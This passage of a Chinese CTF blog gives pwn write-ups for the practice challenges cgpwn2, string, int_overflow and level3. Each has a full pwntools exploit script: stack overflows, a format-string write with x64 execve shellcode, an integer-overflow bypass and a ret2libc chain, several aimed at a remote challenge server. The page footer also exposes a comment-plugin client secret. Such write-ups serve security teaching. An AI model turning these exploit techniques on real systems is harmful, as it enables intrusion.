class="line">	p.sendlineafter(<span class="string">"number:"</span>,str(libc.rand()%<span class="number">6</span>+<span class="number">1</span>))	</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="参考文档"><a href="#参考文档" class="headerlink" title="参考文档"></a>参考文档</h2><p><a href="https://blog.csdn.net/lianghui0811/article/details/76480664" target="_blank" rel="noopener">rand和srand函数的使用</a></p>
<p><a href="https://blog.csdn.net/weixin_45342712/article/details/96995179" target="_blank" rel="noopener"><strong>python调用C的函数</strong></a></p>
<h1 id="cgpwn2"><a href="#cgpwn2" class="headerlink" title="cgpwn2"></a>cgpwn2</h1><blockquote>
<p>ROP绕过nx</p>
</blockquote>
<h2 id="查看开启的保护-4"><a href="#查看开启的保护-4" class="headerlink" title="查看开启的保护"></a>查看开启的保护</h2><p>程序没有/bin/sh,通过name写入/bin/sh的位置。<br>/bin/sh的地址就为name的地址<br><img src="https://s2.ax1x.com/2019/08/19/m3OUQe.png" alt></p>
<p>NX是打开的，所以不能利用栈，</p>
<h2 id="查看程序伪代码"><a href="#查看程序伪代码" class="headerlink" title="查看程序伪代码"></a>查看程序伪代码</h2><p><img src="https://s2.ax1x.com/2019/08/19/m3XrnJ.png" alt></p>
<p>能够利用的gets为name和s两个值。通过<br><img src="https://s2.ax1x.com/2019/08/19/m3XHAI.png" alt></p>
<p>可知s的偏移地址为0x26<br>由此可得<code>payload = 0x26位填充s变量 + 0x4位覆盖EBP + system()函数地址 + 0x4位任意返回地址 + name常量地址</code>写出exp</p>
<h2 id="完整的exp-2"><a href="#完整的exp-2" class="headerlink" title="完整的exp"></a>完整的exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = remote(<span class="string">"111.198.29.45"</span>,<span class="number">46049</span>)</span><br><span class="line"></span><br><span class="line">shadd = <span class="number">0x0804A080</span></span><br><span class="line">sys = <span class="number">0x08048420</span></span><br><span class="line"></span><br><span class="line">payload = <span class="number">0x26</span>*<span class="string">'a'</span>+<span class="number">0x04</span>*<span class="string">'a'</span>+p32(sys)+<span class="string">'a'</span>*<span class="number">0x04</span>+p32(shadd)</span><br><span class="line"></span><br><span class="line">sh.sendlineafter(<span class="string">"\n"</span>,<span class="string">"/bin/sh"</span>)</span><br><span class="line">sh.sendlineafter(<span class="string">"\n"</span>,payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="string"><a href="#string" class="headerlink" title="string"></a>string</h1><blockquote>
<p>覆盖参数，64位的格式化字符串</p>
</blockquote>
<h2 id="查看保护机制"><a href="#查看保护机制" class="headerlink" title="查看保护机制"></a>查看保护机制</h2><p> <img src="https://s2.ax1x.com/2019/08/24/mylGDS.png" alt></p>
<p>开了nx和canary，所以栈溢出是不阔以用的</p>
<h2 id="ida查看伪代码-4"><a href="#ida查看伪代码-4" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p>字符串特别多，所以先跟着程序跑一遍。了解程序结构，先放进虚拟机里面跑。</p>
<p> <img src="https://s2.ax1x.com/2019/08/24/myNJtU.png" alt></p>
<p>这些全部都是字符串。它上边还有条龙，我还没截出来= = </p>
<p>但是这都不重要，被框除了来的是我的全部输入，跑完一遍之后你就晓得在east和1这两个输入这里是只能这么输入的。然后再到ida里面去看，输入的值最后是在哪个函数。</p>
<p><img src="https://s2.ax1x.com/2019/08/24/myNb9g.png" alt></p>
<p>在这个函数里面可以看到一个没有被显示到的字符串和一些数据段</p>
<p> <img src="https://s2.ax1x.com/2019/08/24/myUZHx.png" alt></p>
<p>让我去看看mmap能干嘛用，然后我就看到了这个。也就是说mmap可以直接读入一个函数然后直接调用。这就意味着，我们可以直接去读入shellcode然后直接调用shellcode。</p>
<p><img src="https://s2.ax1x.com/2019/08/24/myBju4.png" alt></p>
<p>然而这个函数在这个的判断下面</p>
<p> <img src="https://s2.ax1x.com/2019/08/24/myUQ8e.png" alt></p>
<p>这个判断的意思是如果a1数组的第一位和第二位相同，则进入循环。根据main函数传过来的参数，发现为v4。进入main函数看到下列代码，在虚拟机运行的那里，我们可以直接看到这个数组的地址已经被输出了，然后我们直接拿过来用就可以了</p>
<p> <img src="https://s2.ax1x.com/2019/08/24/myww8O.png" alt></p>
<p>计算偏移值为。。。。等下，到现在我们还没有找到漏洞在哪里= =，再到ida里面看一遍，然后发现了这个，在最后一个输入中能看到一个很明显的格式化漏洞</p>
<p> <img src="https://s2.ax1x.com/2019/08/24/mygpUH.png" alt></p>
<p>就在最后一个输入这里。我是真的菜= =    。在最后这个输入这里算偏移，输入后得到数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">And, you wish is:</span><br><span class="line">aaaa,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x</span><br><span class="line">Your wish is</span><br><span class="line">aaaa,f7dd26a3,f7dd3780,f7b042c0,f7fda700,f7fda700,22,100,61616161,252c7825,2c78252c,78252c78,252c7825,2c78252c,400078,f7a7c7faI hear it, I hear it....</span><br></pre></td></tr></table></figure>
<p>得到偏移为7。</p>
<h2 id="完整exp为"><a href="#完整exp为" class="headerlink" title="完整exp为"></a>完整exp为</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">"111.198.29.45"</span>,<span class="string">"37070"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"secret[0] is"</span>)</span><br><span class="line">addr = int(p.recvuntil(<span class="string">"\n"</span>).strip(),<span class="number">16</span>)</span><br><span class="line">p.recvuntil(<span class="string">"What should your character's name be:"</span>)</span><br><span class="line">p.sendline(<span class="string">"AAAA"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"?east or up?:"</span>)</span><br><span class="line">p.sendline(<span class="string">"east"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"or leave(0)?:"</span>)</span><br><span class="line">p.sendline(<span class="string">"1"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"an address'"</span>)</span><br><span class="line">p.sendline(str(addr))</span><br><span class="line">p.recvuntil(<span class="string">"And, you wish is:"</span>)</span><br><span class="line">payload = <span class="string">"%085d%7$n"</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(<span class="string">"I will help you! USE YOU SPELL"</span>)</span><br><span class="line">p.sendline(<span class="string">"\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="int-overflow"><a href="#int-overflow" class="headerlink" title="int_overflow"></a>int_overflow</h1><blockquote>
<p>整形溢出 构造ROP链</p>
<p>retlibc2重复利用</p>
</blockquote>
<h2 id="查看保护-1"><a href="#查看保护-1" class="headerlink" title="查看保护"></a>查看保护</h2><p>在只开启了NX和RELRO的条件下，利用ROP链。</p>
<p> <img src="https://s2.ax1x.com/2019/08/23/mDrF7q.png" alt></p>
<h2 id="打开ida查看伪代码-1"><a href="#打开ida查看伪代码-1" class="headerlink" title="打开ida查看伪代码"></a>打开ida查看伪代码</h2><p>先运行代码</p>
<p> <img src="https://s2.ax1x.com/2019/08/23/mDsEqA.png" alt></p>
<p>程序只有输入1之后才可以继续输入，然后输入字符串，能拿到的溢出输入也是在login函数里面，所以直接观察login函数以及check_passwd函数</p>
<p> <img src="https://s2.ax1x.com/2019/08/23/mDyYOH.png" alt></p>
<p> <img src="https://s2.ax1x.com/2019/08/23/mD6ngS.png" alt></p>
<p>题目中限制了密码的长度是在4~8（也就是<code>v3 &lt;= 3u || v3 &gt; 8u</code>）之间的，但是需要覆盖的dest内存为0x14。</p>
<p>·<img src="https://s2.ax1x.com/2019/08/23/mD6ggO.png" alt></p>
<p>这里需要引入一个叫做整形溢出的概念，在main函数中我们已知v3是8为字节数，也就是255位的数，正常来说，也就是在一般条件下。我们输入的字节是不会大于这个数的。但是，在极端条件下，人为的输入过长的字符串已经超过了255个字节，例如256个字节，程序就会认为我们输入的数为0个字节，但是程序还是会对总长为266的字符串产生出结果，达到我们想要的目的。也就是相当于一个人转了360度，朝向的方向还是相同的。</p>
<p>在这个题目当中，限定了输入的长度（4~8）。我们输入完payload之后，溢出v3这个整形数据到259~263之间。</p>
<p>就能绕过限制密码长度的这个判定了</p>
<p>由于题目中拥有直接的cat flag，那么就只有把函数溢出然后ret到这个地址就可以了。</p>
<p> <img src="https://s2.ax1x.com/2019/08/23/mDgnmQ.png" alt></p>
<p>所以<code>payload = 覆盖dest0x14 + 覆盖EBP0x04 +system（“/bin/sh”）函数的地址 + 填充数据到字节为260的值</code></p>
<h2 id="完整的exp为"><a href="#完整的exp为" class="headerlink" title="完整的exp为"></a>完整的exp为</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line">p = remote(<span class="string">"111.198.29.45"</span>,<span class="number">50638</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"choice"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"username"</span>,<span class="string">"awd"</span>)</span><br><span class="line"></span><br><span class="line">payload = (<span class="number">0x14</span>+<span class="number">0x04</span>)*<span class="string">'a'</span> + p32(<span class="number">0x0804868B</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'passwd'</span>,payload.ljust(<span class="number">260</span>,<span class="string">"A"</span>))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h1><blockquote>
<p>read() 栈溢出rop 。函数中没有system与/bin/sh函数，用ret2libc需要重复调用函数造成两次输入，一次利用read函数算出libc的基础地址。一次调用system（/bin/sh）</p>
</blockquote>
<p>这是这个里面的比较难一点的题目（应该）。但是做过<a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#ret2shellcode" target="_blank" rel="noopener">ctfwiki</a>的基础ROP的应该能做，里面有ret2libc的利用方法。</p>
<h2 id="查看保护-2"><a href="#查看保护-2" class="headerlink" title="查看保护"></a>查看保护</h2><p> <img src="https://s2.ax1x.com/2019/09/01/nS7rMd.png" alt></p>
<p>只开了nx，也就是可以直接用ROP链，那就能行</p>
<h2 id="ida查看代码"><a href="#ida查看代码" class="headerlink" title="ida查看代码"></a>ida查看代码</h2><p>在这个ida里面可以看见是没得system函数的，但是可以看见有libc，直接用LibcSearcher调用libc文件中的内容就能行，然后这里牵扯到关于plt，got以及动态链接的问题，可以看看我的另外一篇博客<a href="https://cheemanl.github.io/2019/08/31/也不晓得什么时候会写的got表/" target="_blank" rel="noopener">关于got和plt的不完全总结</a> <del>虽然很有可能看了也不晓得看了个啥，因为写的人就很辣鸡</del> </p>
<p> <img src="https://s2.ax1x.com/2019/09/01/npSluT.png" alt></p>
<p>题目不难理解，就和level0和level2差不多得函数，只是缺少了system函数而已，因此我们用到libc的内容来构造ROP链。总的思路就是</p>
<ol>
<li>先得到write函数plt与got的值，得到write的真实地址。</li>
<li>通过LibcSreacher获取libc 的版本</li>
<li>通过libc的版本找到system，/bin/sh的值</li>
<li>计算偏移值</li>
<li>得到shell</li>
</ol>
<p>总的来说，步骤就是这样的。</p>
<p>所以<code>payload1 = 覆盖buf段 + 覆盖EBP + 调用write + vuln覆盖ret地址（重新进入vuln函数） +文件描述符 +  重新调用write + 写入的长度</code></p>
<p><code>payload2 = 覆盖buf段 + 覆盖EBP + 调用system的值 + 返回地址 + 调用binsh的值</code></p>
<p>但是我在第一次调用这个值的时候，就是不能第二次进去vuln函数，然后我就改了改前面的那个参数从0x0改成0x1，然后就可以了，别问我为什么，我也不晓得</p>
<p>百度了之后，应该是一个liunx下程序函数启动之后的对应的函数的启动符的东西。</p>
<h2 id="完整exp-4"><a href="#完整exp-4" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./libc'</span>)</span><br><span class="line"><span class="comment"># p = remote("",)</span></span><br><span class="line">e = ELF(<span class="string">'./libc'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">read_got = e.got[<span class="string">'write'</span>]</span><br><span class="line">read_plt = e.plt[<span class="string">'write'</span>]</span><br><span class="line">vun_addr = e.symbols[<span class="string">'vulnerable_function'</span>]</span><br><span class="line"></span><br><span class="line">payload1 = <span class="number">0x88</span> *<span class="string">'A'</span>+ <span class="number">0x04</span> * <span class="string">'A'</span> + p32(read_plt) + p32(vun_addr) + p32(<span class="number">0x1</span>) +p32(read_got) + p32(<span class="number">0x4</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"\n"</span>,payload1)</span><br><span class="line"></span><br><span class="line">read_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">libcs = LibcSearcher(<span class="string">'write'</span>,read_addr)</span><br><span class="line">bin_sh_off = libcs.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line">system_off = libcs.dump(<span class="string">'system'</span>)</span><br><span class="line">exit_off   = libcs.dump(<span class="string">'exit'</span>)</span><br><span class="line">write_off  = libcs.dump(<span class="string">'write'</span>)</span><br><span class="line">libc = read_addr - write_off</span><br><span class="line"></span><br><span class="line">system = libc + system_off</span><br><span class="line">binsh = libc + bin_sh_off</span><br><span class="line">exit = libc  + exit_off</span><br><span class="line"></span><br><span class="line">payload = <span class="number">0x88</span> *<span class="string">'a'</span> + <span class="number">0x04</span> *<span class="string">'a'</span> + p32(system) +p32(exit) + p32(binsh)</span><br><span class="line">p.sendlineafter(<span class="string">"\n"</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

  </article>

  <div class="nexmoe-post-meta nexmoe-rainbow">
    
    
        <a class="nexmoefont icon-tag-fill -link" href="/tags/ctf/">ctf</a>
    
</div>

  <div class="nexmoe-post-footer">
    
      
  <div class="nexmoe-post-copyright">
    <strong>Author：</strong>chessman<br>
    <strong>Link：</strong><a href="http://chessman.me/2019/08/19/攻防世界/攻防世界自闭之路/" title="http://chessman.me/2019/08/19/攻防世界/攻防世界自闭之路/" target="_blank" rel="noopener">http://chessman.me/2019/08/19/攻防世界/攻防世界自闭之路/</a><br>
    
      <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
    
  </div>


    
    <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
  </div>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js,gh/nexmoe/nexmoe.github.io@latest/js/app.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<!--<script src="/js/app.js?v=1586857528227"></script>-->


    <script src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>


 
<script> 
!function(e,t,a){function n(){c(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"),o(),r()}function r(){for(var e=0;e<d.length;e++)d[e].alpha<=0?(t.body.removeChild(d[e].el),d.splice(e,1)):(d[e].y--,d[e].scale+=.004,d[e].alpha-=.013,d[e].el.style.cssText="left:"+d[e].x+"px;top:"+d[e].y+"px;opacity:"+d[e].alpha+";transform:scale("+d[e].scale+","+d[e].scale+") rotate(45deg);background:"+d[e].color+";z-index:99999");requestAnimationFrame(r)}function o(){var t="function"==typeof e.onclick&&e.onclick;e.onclick=function(e){t&&t(),i(e)}}function i(e){var a=t.createElement("div");a.className="heart",d.push({el:a,x:e.clientX-5,y:e.clientY-5,scale:1,alpha:1,color:s()}),t.body.appendChild(a)}function c(e){var a=t.createElement("style");a.type="text/css";try{a.appendChild(t.createTextNode(e))}catch(t){a.styleSheet.cssText=e}t.getElementsByTagName("head")[0].appendChild(a)}function s(){return"rgb("+~~(255*Math.random())+","+~~(255*Math.random())+","+~~(255*Math.random())+")"}var d=[];e.requestAnimationFrame=function(){return e.requestAnimationFrame||e.webkitRequestAnimationFrame||e.mozRequestAnimationFrame||e.oRequestAnimationFrame||e.msRequestAnimationFrame||function(e){setTimeout(e,1e3/60)}}(),n()}(window,document);
</script>

  





</body>

</html>
